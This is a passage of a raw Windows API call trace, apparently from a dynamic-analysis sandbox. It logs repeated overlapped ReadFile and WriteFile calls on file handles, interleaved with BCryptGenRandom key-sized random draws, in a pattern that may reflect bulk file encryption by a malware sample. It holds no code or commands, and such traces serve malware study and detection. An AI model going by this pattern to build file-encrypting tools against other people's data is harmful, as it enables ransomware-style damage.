lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.999] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.999] CloseHandle (hObject=0x2a4) returned 1 [0161.999] free (_Block=0x3df0008) [0162.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.010] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.010] free (_Block=0x3e305b8) [0162.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.010] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.011] free (_Block=0x1fa91d0) [0162.011] free (_Block=0x1fa2ed8) [0162.011] free (_Block=0x1fa90b8) [0162.011] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.011] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.023] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.023] CloseHandle (hObject=0x2a4) returned 1 [0162.023] free (_Block=0x3df0008) [0162.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.034] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.034] free (_Block=0x3e305b8) [0162.034] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.034] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.034] free (_Block=0x1fa91d0) [0162.034] free (_Block=0x1fa2ed8) [0162.034] free (_Block=0x1fa90b8) [0162.035] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.036] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.037] CloseHandle (hObject=0x2a4) returned 1 [0162.038] free (_Block=0x3df0008) [0162.038] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.048] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.048] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.048] free (_Block=0x3e305b8) [0162.048] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.048] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.048] free (_Block=0x1fa91d0) [0162.048] free (_Block=0x1fa2ed8) [0162.048] free (_Block=0x1fa90b8) [0162.049] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.050] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.051] CloseHandle (hObject=0x2a4) returned 1 [0162.051] free (_Block=0x3df0008) [0162.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.063] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.064] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.064] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.064] free (_Block=0x3e305b8) [0162.064] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.065] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.065] free (_Block=0x1fa91d0) [0162.065] free (_Block=0x1fa2ed8) [0162.065] free (_Block=0x1fa90b8) [0162.065] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.067] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.068] CloseHandle (hObject=0x2a4) returned 1 [0162.068] free (_Block=0x3df0008) [0162.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.078] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.078] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.079] free (_Block=0x3e305b8) [0162.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.079] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.079] free (_Block=0x1fa91d0) [0162.079] free (_Block=0x1fa2ed8) [0162.079] free (_Block=0x1fa90b8) [0162.079] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.080] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.146] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7d14, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.148] CloseHandle (hObject=0x2a4) returned 1 [0162.148] free (_Block=0x3df0008) [0162.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.165] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.165] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.165] free (_Block=0x3e305b8) [0162.165] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.165] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.166] free (_Block=0x1fa91d0) [0162.166] free (_Block=0x1fa2ed8) [0162.166] free (_Block=0x1fa90b8) [0162.166] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.171] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.185] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.185] free (_Block=0x3e305b8) [0162.185] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.185] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.186] free (_Block=0x1fa91d0) [0162.186] free (_Block=0x1fa2ed8) [0162.186] free (_Block=0x1fa90b8) [0162.186] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.198] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.199] free (_Block=0x3e305b8) [0162.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.199] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.199] free (_Block=0x1fa91d0) [0162.199] free (_Block=0x1fa2ed8) [0162.199] free (_Block=0x1fa90b8) [0162.200] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.213] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.213] free (_Block=0x3e305b8) [0162.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.213] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.213] free (_Block=0x1fa91d0) [0162.213] free (_Block=0x1fa2ed8) [0162.213] free (_Block=0x1fa90b8) [0162.214] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.224] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.224] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.224] free (_Block=0x3e305b8) [0162.224] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.224] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.224] free (_Block=0x1fa91d0) [0162.224] free (_Block=0x1fa2ed8) [0162.224] free (_Block=0x1fa90b8) [0162.224] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.266] CloseHandle (hObject=0x2a8) returned 1 [0162.266] free (_Block=0x3d70450) [0162.266] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.325] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.333] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0162.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0162.334] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.334] free (_Block=0x3e305b8) [0162.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.334] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.335] free (_Block=0x1fa91d0) [0162.335] free (_Block=0x1fa2ed8) [0162.335] free (_Block=0x1fa90b8) [0162.335] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0162.340] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: 